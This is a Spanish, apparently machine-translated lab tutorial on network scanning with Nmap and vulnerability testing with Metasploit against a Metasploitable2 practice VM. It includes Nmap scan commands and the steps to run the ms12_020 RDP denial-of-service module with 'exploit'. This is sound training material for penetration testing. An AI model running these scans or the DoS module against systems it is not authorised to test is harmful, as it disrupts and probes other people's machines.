Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades

NmapNmapBeginner
Practicar Ahora

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderás cómo utilizar Nmap y Metasploit para el escaneo de redes y el análisis de vulnerabilidades. Nmap (Network Mapper) es una poderosa utilidad de código abierto para la detección de redes y la auditoría de seguridad, mientras que Metasploit es un marco de pruebas de penetración ampliamente utilizado que incluye una variedad de herramientas de explotación y cargas útiles (payloads).

El objetivo de este laboratorio es brindarte experiencia práctica en el uso de Nmap para realizar varios tipos de escaneos, analizar los resultados y aprovechar Metasploit para explorar más a fondo las posibles vulnerabilidades en un sistema objetivo.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) nmap/NmapGroup -.-> nmap/installation("Installation and Setup") nmap/NmapGroup -.-> nmap/save_output("Save Output to File") nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/os_version_detection("OS and Version Detection") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") wireshark/WiresharkGroup -.-> wireshark/interface("Interface Overview") wireshark/WiresharkGroup -.-> wireshark/packet_capture("Packet Capture") subgraph Lab Skills nmap/installation -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/save_output -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/port_scanning -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/host_discovery -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/target_specification -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/os_version_detection -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} nmap/service_detection -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} wireshark/interface -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} wireshark/packet_capture -.-> lab-416120{{"Uso de Nmap y Metasploit para el Escaneo de Redes y el Análisis de Vulnerabilidades"}} end

Configuración del entorno

En este paso, configurarás el entorno de laboratorio lanzando el contenedor de Kali Linux y la máquina virtual Metasploitable2.

sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

Prueba si la máquina virtual está encendida y funcionando enviándole un ping:

ping 192.168.122.102

A continuación, inicia el contenedor de Kali Linux y entra en su entorno bash:

docker run -ti --network host b5b709a49cd5 bash

Prueba la conexión de red virtual en el contenedor de Kali, utiliza Ctrl-C para salir del ping:

ping 192.168.122.102

Uso básico de Nmap

En este paso, aprenderás cómo utilizar Nmap para tareas básicas de escaneo, como la detección de hosts, el escaneo de puertos, la detección de versiones y la detección del sistema operativo.

Realiza un escaneo completo ejecutando el siguiente comando:

nmap -T4 -A 192.168.122.102

Escanea para la detección de hosts ejecutando el siguiente comando:

nmap -T4 -sn 192.168.122.102

Realiza un escaneo de puertos ejecutando el siguiente comando:

nmap -T4 192.168.122.102

Realiza la detección del sistema operativo ejecutando el siguiente comando:

nmap -T4 -O 192.168.122.102

La opción -T4 establece la plantilla de temporización para un escaneo agresivo, mientras que la opción -A habilita la detección del sistema operativo, el escaneo de versiones, el escaneo de scripts y la traza de ruta (traceroute). La opción -sn realiza un simple escaneo de detección de hosts, y la opción -O intenta detectar el sistema operativo remoto.

Uso avanzado de Nmap

En este paso, explorarás técnicas de escaneo más avanzadas de Nmap, como escanear subredes completas, rangos de puertos específicos y especificar la interfaz de red.

Escanea una subred completa ejecutando el siguiente comando:

nmap 127.0.0.1/24

Escanea puertos específicos ejecutando el siguiente comando:

nmap -p80,22,66 127.0.0.1

Lista las interfaces de red locales ejecutando el siguiente comando:

nmap --iflist

Especifica la interfaz de red ejecutando el siguiente comando:

nmap -e eth0 127.0.0.1

Estas técnicas avanzadas te permiten ajustar tus escaneos y recopilar información más detallada sobre la red o los hosts objetivo.

Importación de resultados de escaneo de Nmap a Metasploit

En este paso, aprenderás cómo importar los resultados de un escaneo de Nmap a Metasploit para un análisis y explotación adicionales.

  1. Realiza un escaneo completo y guarda la salida en un archivo XML ejecutando el siguiente comando, y asegúrate de colocar el archivo XML en el directorio de inicio ~/, este paso puede tomar algún tiempo:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Inicia la consola de Metasploit:
cd ~
service postgresql start
msfdb init
msfconsole
  1. Importa el archivo XML a Metasploit ejecutando el siguiente comando en la consola de Metasploit:
db_import shiyanlou.xml
  1. Visualiza los servicios importados ejecutando el siguiente comando en la consola de Metasploit:
services
  1. Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Al importar los resultados del escaneo de Nmap a Metasploit, puedes aprovechar las potentes herramientas y módulos disponibles en el marco de Metasploit para analizar y, potencialmente, explotar vulnerabilidades en el sistema objetivo.

Uso de módulos en Metasploit

En este paso, aprenderás cómo buscar y utilizar módulos dentro del marco de Metasploit.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Ahora, puedes buscar módulos utilizando el comando search en la consola de Metasploit:
search ms12-020
  1. Para utilizar un módulo en la consola de Metasploit:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Muestra las opciones disponibles para el módulo en la consola de Metasploit:
show options
  1. Establece las opciones requeridas en la consola de Metasploit:
set RHOST 192.168.122.102
  1. Ejecuta el módulo en la consola de Metasploit:
exploit
  1. Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Metasploit ofrece una amplia gama de módulos para diversos fines, como exploits, payloads, módulos auxiliares, etc. Al buscar y utilizar el módulo adecuado, puedes intentar explotar vulnerabilidades o realizar otras acciones en el sistema objetivo.

Resumen

En este laboratorio, aprendiste cómo utilizar Nmap para el escaneo de redes y la recopilación de información, así como cómo importar los resultados del escaneo a Metasploit para un análisis y explotación adicionales. Adquiriste experiencia práctica con diversas técnicas de escaneo de Nmap, incluyendo la detección de hosts, el escaneo de puertos, la detección de versiones y la detección del sistema operativo. Además, aprendiste cómo buscar y utilizar módulos dentro del marco de Metasploit para potencialmente explotar vulnerabilidades en el sistema objetivo.

A lo largo del laboratorio, practicaste habilidades esenciales para las pruebas de penetración, como configurar un entorno controlado, realizar reconocimiento y analizar posibles vulnerabilidades. Estas habilidades son cruciales en el campo de la ciberseguridad y te ayudarán a desarrollar una comprensión más profunda de los conceptos de seguridad de redes y las técnicas de hacking ético.